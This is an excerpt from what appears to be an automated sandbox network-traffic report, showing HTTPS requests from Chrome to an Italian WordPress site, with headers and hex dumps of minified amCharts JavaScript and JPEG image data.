                                                                                                                                          2024-11-28 10:32:55 UTC8000INData Raw: 61 61 22 3a 62 3d 61 3e 3d 31 32 3f 69 2e 74 72 61 6e 73 6c 61 74 65 28 22 50 2e 4d 2e 22 29 3a 69 2e 74 72 61 6e 73 6c 61 74 65 28 22 41 2e 4d 2e 22 29 3b 62 72 65 61 6b 3b 63 61 73 65 22 61 61 61 22 3a 62 3d 61 3e 3d 31 32 3f 69 2e 74 72 61 6e 73 6c 61 74 65 28 22 50 22 29 3a 69 2e 74 72 61 6e 73 6c 61 74 65 28 22 41 22 29 3b 62 72 65 61 6b 3b 63 61 73 65 22 68 22 3a 62 3d 6c 2e 67 65 74 31 32 48 6f 75 72 73 28 61 29 2e 74 6f 53 74 72 69 6e 67 28 29 3b 62 72 65 61 6b 3b 63 61 73 65 22 68 68 22 3a 62 3d 6c 2e 70 61 64 53 74 72 69 6e 67 28 6c 2e 67 65 74 31 32 48 6f 75 72 73 28 61 29 2c 32 2c 22 30 22 29 3b 62 72 65 61 6b 3b 63 61 73 65 22 48 22 3a 62 3d 61 2e 74 6f 53 74 72 69 6e 67 28 29 3b 62 72 65 61 6b 3b 63 61 73 65 22 48 48 22 3a 62 3d 6c 2e 70 61
                                                                                                                                          Data Ascii: aa":b=a>=12?i.translate("P.M."):i.translate("A.M.");break;case"aaa":b=a>=12?i.translate("P"):i.translate("A");break;case"h":b=l.get12Hours(a).toString();break;case"hh":b=l.padString(l.get12Hours(a),2,"0");break;case"H":b=a.toString();break;case"HH":b=l.pa
                                                                                                                                          2024-11-28 10:32:55 UTC8000INData Raw: 53 70 72 69 74 65 28 29 7d 2c 65 6e 75 6d 65 72 61 62 6c 65 3a 21 30 2c 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 7d 29 2c 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 65 2e 70 72 6f 74 6f 74 79 70 65 2c 22 74 69 6d 65 7a 6f 6e 65 4f 66 66 73 65 74 22 2c 7b 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 5f 74 69 6d 65 7a 6f 6e 65 4f 66 66 73 65 74 7d 2c 73 65 74 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 74 68 69 73 2e 5f 74 69 6d 65 7a 6f 6e 65 4f 66 66 73 65 74 21 3d 74 26 26 28 74 68 69 73 2e 5f 74 69 6d 65 7a 6f 6e 65 4f 66 66 73 65 74 3d 74 2c 74 68 69 73 2e 69 6e 76 61 6c 69 64 61 74 65 53 70 72 69 74 65 28 29 29 7d 2c 65 6e 75 6d 65 72 61 62 6c 65 3a 21 30 2c 63 6f 6e 66 69 67 75 72 61 62 6c 65
                                                                                                                                          Data Ascii: Sprite()},enumerable:!0,configurable:!0}),Object.defineProperty(e.prototype,"timezoneOffset",{get:function(){return this._timezoneOffset},set:function(t){this._timezoneOffset!=t&&(this._timezoneOffset=t,this.invalidateSprite())},enumerable:!0,configurable
                                                                                                                                          2024-11-28 10:32:55 UTC8000INData Raw: 64 73 28 29 29 2b 22 2e 22 2b 28 69 3e 39 39 3f 69 3a 22 30 22 2b 73 28 69 29 29 2b 22 5a 22 7d 3a 6f 7d 2c 41 36 41 56 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 69 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 69 2e 64 28 65 2c 22 61 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 63 7d 29 3b 76 61 72 20 6e 3d 69 28 22 6d 34 2f 6c 22 29 2c 72 3d 69 28 22 54 6a 6c 2b 22 29 2c 6f 3d 69 28 22 78 37 39 58 22 29 2c 73 3d 69 28 22 31 79 79 6a 22 29 2c 61 3d 69 28 22 76 39 55 54 22 29 2c 75 3d 69 28 22 68 4a 35 69 22 29 2c 6c 3d 69 28 22 51 6b 64 70 22 29 2c 68 3d 69 28 22 4d 74 70 6b 22 29 2c 63 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 66 75 6e 63 74 69 6f 6e 20 65 28 29 7b 76 61 72 20 65 3d 74 2e 63 61 6c 6c 28 74 68 69 73 29 7c 7c 74 68 69 73 3b 72
                                                                                                                                          Data Ascii: ds())+"."+(i>99?i:"0"+s(i))+"Z"}:o},A6AV:function(t,e,i){"use strict";i.d(e,"a",function(){return c});var n=i("m4/l"),r=i("Tjl+"),o=i("x79X"),s=i("1yyj"),a=i("v9UT"),u=i("hJ5i"),l=i("Qkdp"),h=i("Mtpk"),c=function(t){function e(){var e=t.call(this)||this;r


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          45192.168.2.4498035.57.41.1194432692C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-28 10:32:56 UTC646OUTGET /wp-content/uploads/sites/71/2017/02/HeaderImage_bilacon05.jpg HTTP/1.1
                                                                                                                                          Host: www.agriparadigma.it
                                                                                                                                          Connection: keep-alive
                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                          Referer: https://www.agriparadigma.it/
                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          2024-11-28 10:32:56 UTC282INHTTP/1.1 200 OK
                                                                                                                                          Date: Thu, 28 Nov 2024 10:32:56 GMT
                                                                                                                                          Server: Apache
                                                                                                                                          Last-Modified: Tue, 29 May 2018 16:08:40 GMT
                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                          Content-Length: 209711
                                                                                                                                          Cache-Control: max-age=31536000
                                                                                                                                          Expires: Fri, 28 Nov 2025 10:32:56 GMT
                                                                                                                                          Connection: close
                                                                                                                                          Content-Type: image/jpeg
                                                                                                                                          2024-11-28 10:32:56 UTC7910INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 02 02 02 02 02 02 02 02 02 02 03 02 02 02 03 04 03 02 02 03 04 05 04 04 04 04 04 05 06 05 05 05 05 05 05 06 06 07 07 08 07 07 06 09 09 0a 0a 09 09 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c ff db 00 43 01 03 03 03 05 04 05 09 06 06 09 0d 0b 09 0b 0d 0f 0e 0e 0e 0e 0f 0f 0c 0c 0c 0c 0c 0f 0f 0c 0c 0c 0c 0c 0c 0f 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c ff c2 00 11 08 02 4b 06 40 03 01 11 00 02 11 01 03 11 01 ff c4 00 1d 00 00 00 07 01 01 01 00 00 00 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 ff c4 00 1b 01 01 01 01 01 01 01 01 01 00 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 ff da 00 0c 03 01 00 02 10 03 10 00 00 01 f4 27 5f 12
                                                                                                                                          Data Ascii: JFIFCCK@'_
                                                                                                                                          2024-11-28 10:32:56 UTC8000INData Raw: 0d e3 4a 44 ca 6a 56 c5 95 85 75 21 da d5 97 dd 22 a5 6c 66 5a eb a6 52 32 e1 77 da 8a ef aa 4f 3d 86 72 d2 c7 ac f6 ed bf 6e 1d 13 d7 e2 e8 3e 8f 0b fa c5 5b 2d 92 65 0a b1 40 1b 86 88 76 3a 5c 5a f2 3d 2b 81 93 26 a3 6b 20 5a 88 af ef c0 dc b8 a7 93 e8 71 4f 83 fa 9e 9b bf 3e ff 00 d1 e5 9b 73 27 7c db b6 24 d6 47 8f b2 be 28 ba f9 f9 c6 3a f4 4a e9 9a c2 b3 a7 04 c6 73 87 6a 92 a3 3d 73 3d 37 e7 6f a9 f0 d5 df ca be fc 3b 97 a3 87 5e b3 0d cf 7e 76 f3 7a b6 1c 3d 1c 3b c9 ee e5 5e af 04 4d f9 c8 7e eb bd fa 31 ea 3f 47 9e cb 5c fb 67 9f a9 f9 7d 6f e2 ce e9 ce 8f f4 3f 88 4d 91 f6 87 ae 71 b5 98 77 28 5c 3f c1 fd 5b fe 5e fd d1 db 49 74 68 d8 50 2d 31 48 62 8a ac eb 05 c3 79 2f 44 ca 7a 3a c8 e5 d3 61 e7 e5 77 e7 d0 0e 08 4d 20 7a c9 1a cb 94 60 05 10
                                                                                                                                          Data Ascii: JDjVu!"lfZR2wO=rn>[-e@v:\Z=+&k ZqO>s'|$G(:Jsj=s=7o;^~vz=;^M~1?G\g}o?Mqw(\?[^IthP-1Hby/Dz:awM z`
                                                                                                                                          2024-11-28 10:32:57 UTC8000INData Raw: e0 0a 1c 95 c8 5c ae 0a 54 24 2d 66 26 a9 8b 40 05 4d 39 98 63 17 4f c0 08 af d6 61 89 14 3c 4a 1c 86 ab 31 d3 15 bb 97 78 3c 39 34 f4 af 66 95 35 23 54 e5 93 73 55 2c 61 34 c5 ce 77 79 78 b2 9a b6 e7 a8 b7 2c d8 9a 9b 9d 36 53 6f 27 4d 80 b0 c9 70 b5 44 2e 68 ac 42 14 72 9f 5f 9a ab db c6 17 5f 3e 6f a6 79 e4 ef 91 5e b7 e7 d7 a4 be 6f ba 76 35 36 5b 9c d7 13 9a 76 e7 a5 ce a5 c4 99 72 dd 33 26 5b 18 9b 14 bd 32 d9 7d cf 72 d1 bb 14 4d 95 78 bc 9b 96 94 bc 6a fa fa 57 ab 9f 8b 3c 9d 7c ed cf 8e ab b7 0c c7 3e cd cb bc ea fa b1 df c3 61 f5 3f 3a b9 4d 5e c4 c4 7a fc 8e 67 66 79 63 ea 7c 3d 0e be 75 7b ab b5 64 f3 e3 f7 e9 d1 6b e6 65 39 fd 7b cd 78 28 67 ba cb 5e 6b 9d 78 f4 79 77 2f 89 fb 97 26 99 9a cb 7c 1f d6 8c e8 d4 d2 8e f9 7c 7b f3 3e 5d 0f 5e ba
                                                                                                                                          Data Ascii: \T$-f&@M9cOa<J1x<94f5#TsU,a4wyx,6So'MpD.hBr__>oy^ov56[vr3&[2}rMxjW<|>a?:M^zgfyc|=u{dke9{x(g^kxyw/&||{>]^
                                                                                                                                          2024-11-28 10:32:57 UTC8000INData Raw: 74 93 24 c8 9d 9a f8 f9 22 57 51 cc e8 d5 03 16 31 a8 84 40 90 a0 c1 52 e6 de 87 20 c1 0f 4a 90 aa ba 96 86 4a 1a 80 80 4d 62 3b 66 54 9e 56 fd 67 cd f3 57 df f1 7a 23 e0 fb fd d5 f8 df a7 0b 50 46 6b 73 37 bc e8 71 ab 08 97 0f cb 77 9b 2f 35 ec d6 b5 10 12 28 48 63 85 56 e4 0a 93 1c f7 a6 2b 2c b9 94 c8 56 42 23 58 c2 a4 91 13 c9 72 c9 68 8a ab 9a 4a ea 9c b6 f2 47 23 d3 44 6b 09 5b 19 15 4e e6 de f2 de c3 3b b2 ce 8a 13 49 42 14 84 a9 12 8a 0c 4c ac ac 05 cf b7 c7 b7 d7 90 7b bc 17 7b f3 c0 5c 2f 4e 38 2e de 77 ef 6f 74 f8 3d 3d 4b 86 9d 46 75 1d 96 5e 29 19 bf 67 87 1b f4 7e 1b 77 0a 55 cd 2a 00 00 22 c4 dc 95 12 15 84 c8 00 40 59 9f 27 f4 87 e2 fa 29 82 52 84 aa 44 a2 55 07 5b df 39 b2 e7 77 ca ff 00 1d 4b 50 90 80 12 72 59 9e 37 8a 58 e9 98 e9 e7 3d
                                                                                                                                          Data Ascii: t$"WQ1@R JJMb;fTVgWz#PFks7qw/5(HcV+,VB#XrhJG#Dk[N;IBL{{\/N8.wot==KFu^)g~wU*"@Y')RDU[9wKPrY7X=
                                                                                                                                          2024-11-28 10:32:57 UTC8000INData Raw: e6 70 a5 5b 32 41 a3 c1 46 be 9c e6 c8 e1 e5 15 4e e4 f4 5e c9 2b 6a 31 6a 50 45 4e 16 6a 3a 9c b2 69 77 b5 9c 3f ab e9 ff 00 f9 28 a7 72 77 2d 2f ee 87 60 5b 7d a7 37 2a 48 37 27 d3 05 3b 4d 6a 1a 70 09 b4 f0 8d 64 6b 95 d0 2b a2 e5 d3 72 d8 f5 b5 c8 07 21 9e d2 9f ca aa 67 79 53 fc 59 fc b2 b7 2d cb 7a de ba 8b a8 ba 81 07 85 b5 61 61 63 fb 05 ca bd 1b 96 95 7e 1f 0a bd 3a d5 47 3c 21 e1 67 0e f6 0a b0 7a 16 25 8a 3b 50 c8 c9 2a 4e d7 e4 67 93 be 03 8a ca 29 e9 de 54 0f 21 31 c0 f2 72 28 ac ac ab 55 77 a7 82 c5 1c 02 67 d2 d3 0c ae 8c c5 13 1f 2b 53 26 6a ea b5 75 1a b7 85 b8 2d c1 7c a6 c5 22 e8 3d 36 ba 0c 6b 7b 70 8f 22 8e 7b ad 37 2d 0e ca d7 68 fa fa 35 5e ab 3d 35 de 3a 9e 77 27 15 6e c8 6a 7b 9e 1d b4 86 d9 db 8a ad ca ac ff 00 bb a8 30 e3 92 02
                                                                                                                                          Data Ascii: p[2AFN^+j1jPENj:iw?(rw-/`[}7*H7';Mjpdk+r!gySY-zaac~:G<!gz%;P*Ng)T!1r(Uwg+S&ju-|"=6k{p"{7-h5^=5:w'nj{0
                                                                                                                                          2024-11-28 10:32:57 UTC8000INData Raw: fe 01 5f 56 59 fb 30 3c f4 b4 49 3a ba 2f 32 3e f9 a3 dd 5f 4f b2 27 89 80 a6 b5 cb 07 96 56 56 56 56 56 7b 65 af 0c ad b7 c1 2e ae ce 12 92 d5 1b 6d ef 90 60 8e 6d 3c dc d4 e6 a7 31 0d cc 31 59 0e e5 c5 74 ba 66 e9 cb 38 6e 3e b6 aa d1 e3 90 5a 8c bf 6b 42 8c 26 af f1 e7 2f 41 46 9e f1 d4 69 08 79 4c fb 90 6a c6 15 ab 2d a9 04 9c 7f a6 65 df 57 2a b4 bf ea fc 05 b6 3e af 5d 85 e3 eb 35 d0 b5 0f aa 57 6f 4d ff 00 e9 17 b0 df a9 37 02 93 ea 45 a9 53 78 b7 48 04 71 9b ab c9 ff 00 e8 97 8d c6 fd 4d b0 56 87 73 d7 e9 bc ef 7e 63 96 b4 ce a6 9d a1 bb 76 9b 3f ed f1 1e a2 dd f4 f8 71 db b4 cd 5b f6 f5 de 5a df d9 aa 4b f7 43 c3 07 15 b8 8f ec ba ef ba 1e 16 fb 59 c8 79 6f 67 c8 12 10 d0 62 5d 48 94 56 e3 84 7e a0 e4 6f cc 9d 66 77 2d ef 45 ef 2b 1f d8 f9 33 9f
                                                                                                                                          Data Ascii: _VY0<I:/2>_O'VVVVV{e.m`m<11Ytf8n>ZkB&/AFiyLj-eW*>]5WoM7ESxHqMVs~cv?q[ZKCYyogb]HV~ofw-E+3
                                                                                                                                          2024-11-28 10:32:57 UTC8000INData Raw: d3 7e a3 a1 0f 92 74 dc 72 46 3b f9 99 69 2c 58 b6 56 2d de 96 26 5a 7c bf 6c b0 f6 d4 ee 37 14 42 1a fe d2 34 b4 09 0c 87 46 53 a9 75 66 24 99 55 28 a2 3c ec 44 72 8a 34 8e e4 ab a5 c9 3c 4a b7 42 6f af 53 5a 20 ae 47 5c 59 4a b5 c5 22 e5 f2 72 35 92 c4 c5 15 a5 e6 3b 8f 63 65 7f e5 cb f6 1e 4c 79 d2 7d 4a 1f cb 42 17 6e 39 df d0 cb b4 c5 da b9 72 e5 f7 dc b9 72 e5 f2 e8 5c b9 72 fb 6d dc 4b 75 48 dd 18 7a da 3a 3e 05 d4 51 2d b1 76 ac 5b 72 2e 26 2a ca ce 2f 27 35 14 54 a9 aa 4d 9a 8d 46 a3 51 a8 d4 6a 35 1a 8d 5d ca 8b ea c9 c6 ac aa 5a 9f b9 84 f0 87 cd 46 68 50 56 43 59 3c a8 4a fd 18 a3 62 b7 04 4b 0d 64 86 ec 29 17 b0 a5 71 33 15 87 f3 15 d7 23 e8 55 59 42 5a 79 3c f6 42 bc d1 47 19 fd c4 7a f5 ca 55 54 49 e2 57 b1 2a ec 94 ee 46 5e c6 91 a2 c6 91
                                                                                                                                          Data Ascii: ~trF;i,XV-&Z|l7B4FSuf$U(<Dr4<JBoSZ G\YJ"r5;ceLy}JBn9rr\rmKuHz:>Q-v[r.&*/'5TMFQj5]ZFhPVCY<JbKd)q3#UYBZy<BGzUTIW*F^
                                                                                                                                          2024-11-28 10:32:57 UTC8000INData Raw: 64 c0 85 d8 55 45 5b 05 0f d4 9c 7c f7 28 f5 30 ab e1 92 8a 97 66 75 5f a4 27 de 99 52 8c a9 be eb 76 38 50 a1 92 2f e9 22 b0 bd bc fc 09 88 76 7b 15 b5 0e 42 15 9b ed b7 c0 ac 88 cb b9 53 cd e9 cb 2a e9 10 88 e3 9f 07 ed e6 c8 f4 b3 1f 4d 22 54 a5 1b 3e 45 ed 1f 0a 17 b4 62 f7 0f 8a 53 fa 8c 59 3b e4 6c ae 8f bd 0e 32 46 19 4e 09 77 33 91 0e f9 14 da ee 8e 93 f5 57 f6 d4 ff 00 c9 09 26 8a 94 a3 35 86 8e a7 f4 9f 98 13 a5 28 79 de b7 d3 f2 53 5e e2 ab 15 98 c6 66 f9 1b 1c 8c 9a c4 c6 ef f2 60 c7 6d a8 94 af 46 5f 02 b7 4f 04 f2 28 a1 5d 12 2a ae e3 e4 56 cf b2 7c 2b da b1 7f 61 aa ec b7 4b c1 55 77 3d 33 c1 23 e0 8a 10 f6 60 d3 93 a0 a8 e3 1d 32 35 09 95 e8 c6 a7 93 a8 fd 39 c7 c1 28 38 ed 5b e9 90 5d bd c5 5f 22 b3 b7 91 db 51 ac 73 19 a4 4c 8c c5 2c 8a
                                                                                                                                          Data Ascii: dUE[|(0fu_'Rv8P/"v{BS*M"T>EbSY;l2FNw3W&5(yS^f`mF_O(]*V|+aKUw=3#`259(8[]_"QsL,
                                                                                                                                          2024-11-28 10:32:57 UTC8000INData Raw: 11 04 12 21 31 13 22 41 51 61 05 10 20 32 40 71 81 23 30 33 42 52 62 91 a1 b1 14 72 82 c1 d1 24 43 53 e1 06 15 34 50 63 92 a2 b2 35 44 60 73 f0 f1 c2 64 83 93 d2 25 54 84 e2 ff da 00 08 01 01 00 06 3f 02 f3 11 76 13 da 2c d6 26 e3 a6 3a 47 53 3a 37 04 40 a4 71 b7 ad 95 4f 04 34 b6 90 03 b2 8d a4 de 77 79 a2 37 bc 8b 0f 54 30 e2 7b f7 ac e8 06 cf e6 9a 24 88 9b d9 53 33 f1 55 2e 9a c7 68 ae 13 3a 30 f6 83 b0 3a 8c 35 0a 91 cd 14 d3 8e bb 21 ab 1c ea 7d c2 3e 6d 5a 27 c8 e0 e1 ea 4a 1b 27 ca 46 b0 aa c7 0c 11 1f 5a 4d 00 1f 31 50 bc 84 f4 9b 6b 63 76 3e 18 05 75 ec 91 e4 67 7c 1f c9 13 1b 2e 7f 9e 9f 55 84 90 87 0e 2e 6a bc f8 db 2f 16 ca b1 6c ad e2 08 2b fb 54 ac 3e f2 a0 b5 89 38 65 f5 40 13 1b 07 b5 99 44 4d ca 10 c7 4f 72 f2 a3 34 96 a7 6f c1 a1 5d b2
                                                                                                                                          Data Ascii: !1"AQa 2@q#03BRbr$CS4Pc5D`sd%T?v,&:GS:7@qO4wy7T0{$S3U.h:0:5!}>mZ'J'FZM1Pkcv>ug|.U.j/l+T>8e@DMOr4o]
                                                                                                                                          2024-11-28 10:32:57 UTC8000INData Raw: 4f 64 8f fe 71 ed 33 d3 6c 6c f5 7f 11 52 d9 2d 4c 12 7d b9 9f b6 b7 61 bd b3 f0 a8 ec 6f 93 4c c8 05 d8 1f ee ec 1e 1c ff 00 45 53 99 59 2c 96 4b 2e 96 4b aa ba ab 25 4a 52 26 fa 47 26 36 21 75 ad c2 9c c7 14 6d 93 65 fb b1 f9 a3 66 8d d4 60 eb 2c b9 aa 54 d1 8c d8 fa fc 55 a8 53 19 1b 79 a9 e6 61 9f 56 ab 55 09 a4 15 b3 59 75 9d c5 db 02 25 5c df 89 0b 5b bd c5 65 86 ce 71 82 17 a9 45 e4 c8 e3 45 8d 02 c6 5a 57 62 a5 f1 de ba cb 15 82 ce ab 0d aa 84 55 79 3d 6f 74 ad 68 dc d4 35 0f 35 0b 8e 2b 1c 78 aa 05 68 23 07 50 0a f4 6c 47 df fc 8f 4c 71 4f 1b 9e 7e bc c3 cd 14 7f e9 6b 83 33 99 58 f9 8e 3e 78 d1 51 aa ab 2f 1e 78 fb c0 67 de 27 3f 04 1b b3 67 36 0a f3 ba bb 06 ff 00 39 92 c9 64 a9 44 18 c1 40 9d c1 50 1c 53 2c cd 37 b6 c9 c0 29 24 7b 83 19 1b 13
                                                                                                                                          Data Ascii: Odq3llR-L}aoLESY,K.K%JR&G&6!umef`,TUSyaVUYu%\[eqEEZWbUy=oth55+xh#PlGLqO~k3X>xQ/xg'?g69dD@PS,7)${


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          46192.168.2.4498045.57.41.1194432692C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-28 10:32:56 UTC584OUTGET /wp-content/themes/tentamus/assets/scripts/amcharts4/maps.js HTTP/1.1
                                                                                                                                          Host: www.agriparadigma.it
                                                                                                                                          Connection: keep-alive
                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                          Accept: */*
                                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                          Referer: https://www.agriparadigma.it/
                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          2024-11-28 10:32:56 UTC317INHTTP/1.1 200 OK
                                                                                                                                          Date: Thu, 28 Nov 2024 10:32:56 GMT
                                                                                                                                          Server: Apache
                                                                                                                                          Last-Modified: Mon, 11 Oct 2021 10:15:54 GMT
                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                          Content-Length: 127200
                                                                                                                                          Cache-Control: max-age=31536000
                                                                                                                                          Expires: Fri, 28 Nov 2025 10:32:56 GMT
                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                          Connection: close
                                                                                                                                          Content-Type: application/javascript
                                                                                                                                          2024-11-28 10:32:56 UTC7875INData Raw: 61 6d 34 69 6e 74 65 72 6e 61 6c 5f 77 65 62 70 61 63 6b 4a 73 6f 6e 70 28 5b 22 63 63 31 65 22 5d 2c 7b 51 4a 37 45 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 65 2c 22 5f 5f 65 73 4d 6f 64 75 6c 65 22 2c 7b 76 61 6c 75 65 3a 21 30 7d 29 3b 76 61 72 20 69 3d 7b 7d 3b 6e 2e 64 28 69 2c 22 67 65 6f 41 72 65 61 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 73 74 7d 29 2c 6e 2e 64 28 69 2c 22 67 65 6f 42 6f 75 6e 64 73 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 65 7d 29 2c 6e 2e 64 28 69 2c 22 67 65 6f 43 65 6e 74 72 6f 69 64 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 70 65 7d 29 2c 6e 2e 64 28 69
                                                                                                                                          Data Ascii: am4internal_webpackJsonp(["cc1e"],{QJ7E:function(t,e,n){"use strict";Object.defineProperty(e,"__esModule",{value:!0});var i={};n.d(i,"geoArea",function(){return st}),n.d(i,"geoBounds",function(){return te}),n.d(i,"geoCentroid",function(){return pe}),n.d(i
                                                                                                                                          2024-11-28 10:32:57 UTC8000INData Raw: 5b 32 5d 2f 3d 65 7d 76 61 72 20 76 74 2c 6d 74 2c 79 74 2c 62 74 2c 50 74 2c 53 74 2c 5f 74 2c 4d 74 2c 78 74 2c 77 74 2c 6a 74 3d 6d 28 29 2c 4c 74 3d 7b 70 6f 69 6e 74 3a 43 74 2c 6c 69 6e 65 53 74 61 72 74 3a 4f 74 2c 6c 69 6e 65 45 6e 64 3a 49 74 2c 70 6f 6c 79 67 6f 6e 53 74 61 72 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 4c 74 2e 70 6f 69 6e 74 3d 54 74 2c 4c 74 2e 6c 69 6e 65 53 74 61 72 74 3d 47 74 2c 4c 74 2e 6c 69 6e 65 45 6e 64 3d 44 74 2c 6a 74 2e 72 65 73 65 74 28 29 2c 69 74 2e 70 6f 6c 79 67 6f 6e 53 74 61 72 74 28 29 7d 2c 70 6f 6c 79 67 6f 6e 45 6e 64 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 69 74 2e 70 6f 6c 79 67 6f 6e 45 6e 64 28 29 2c 4c 74 2e 70 6f 69 6e 74 3d 43 74 2c 4c 74 2e 6c 69 6e 65 53 74 61 72 74 3d 4f 74 2c 4c 74 2e 6c 69 6e 65 45
                                                                                                                                          Data Ascii: [2]/=e}var vt,mt,yt,bt,Pt,St,_t,Mt,xt,wt,jt=m(),Lt={point:Ct,lineStart:Ot,lineEnd:It,polygonStart:function(){Lt.point=Tt,Lt.lineStart=Gt,Lt.lineEnd=Dt,jt.reset(),it.polygonStart()},polygonEnd:function(){it.polygonEnd(),Lt.point=Ct,Lt.lineStart=Ot,Lt.lineE
                                                                                                                                          2024-11-28 10:32:57 UTC8000INData Raw: 66 75 6e 63 74 69 6f 6e 20 67 28 29 7b 70 2e 70 6f 69 6e 74 3d 64 2c 73 2e 6c 69 6e 65 53 74 61 72 74 28 29 7d 66 75 6e 63 74 69 6f 6e 20 76 28 29 7b 70 2e 70 6f 69 6e 74 3d 66 2c 73 2e 6c 69 6e 65 45 6e 64 28 29 7d 66 75 6e 63 74 69 6f 6e 20 6d 28 74 2c 65 29 7b 75 2e 70 75 73 68 28 5b 74 2c 65 5d 29 2c 6c 2e 70 6f 69 6e 74 28 74 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 79 28 29 7b 6c 2e 6c 69 6e 65 53 74 61 72 74 28 29 2c 75 3d 5b 5d 7d 66 75 6e 63 74 69 6f 6e 20 62 28 29 7b 6d 28 75 5b 30 5d 5b 30 5d 2c 75 5b 30 5d 5b 31 5d 29 2c 6c 2e 6c 69 6e 65 45 6e 64 28 29 3b 76 61 72 20 74 2c 65 2c 6e 2c 69 2c 73 3d 6c 2e 63 6c 65 61 6e 28 29 2c 70 3d 63 2e 72 65 73 75 6c 74 28 29 2c 66 3d 70 2e 6c 65 6e 67 74 68 3b 69 66 28 75 2e 70 6f 70 28 29 2c 6f 2e 70 75 73
                                                                                                                                          Data Ascii: function g(){p.point=d,s.lineStart()}function v(){p.point=f,s.lineEnd()}function m(t,e){u.push([t,e]),l.point(t,e)}function y(){l.lineStart(),u=[]}function b(){m(u[0][0],u[0][1]),l.lineEnd();var t,e,n,i,s=l.clean(),p=c.result(),f=p.length;if(u.pop(),o.pus
                                                                                                                                          2024-11-28 10:32:57 UTC8000INData Raw: 6e 74 4d 69 6e 6f 72 3d 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3f 28 65 3d 2b 6e 5b 30 5d 5b 30 5d 2c 74 3d 2b 6e 5b 31 5d 5b 30 5d 2c 6f 3d 2b 6e 5b 30 5d 5b 31 5d 2c 72 3d 2b 6e 5b 31 5d 5b 31 5d 2c 65 3e 74 26 26 28 6e 3d 65 2c 65 3d 74 2c 74 3d 6e 29 2c 6f 3e 72 26 26 28 6e 3d 6f 2c 6f 3d 72 2c 72 3d 6e 29 2c 6d 2e 70 72 65 63 69 73 69 6f 6e 28 76 29 29 3a 5b 5b 65 2c 6f 5d 2c 5b 74 2c 72 5d 5d 7d 2c 6d 2e 73 74 65 70 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3f 6d 2e 73 74 65 70 4d 61 6a 6f 72 28 74 29 2e 73 74 65 70 4d 69 6e 6f 72 28 74 29 3a 6d 2e 73 74 65 70 4d 69 6e 6f 72 28 29 7d 2c 6d 2e 73 74 65 70 4d 61 6a 6f 72
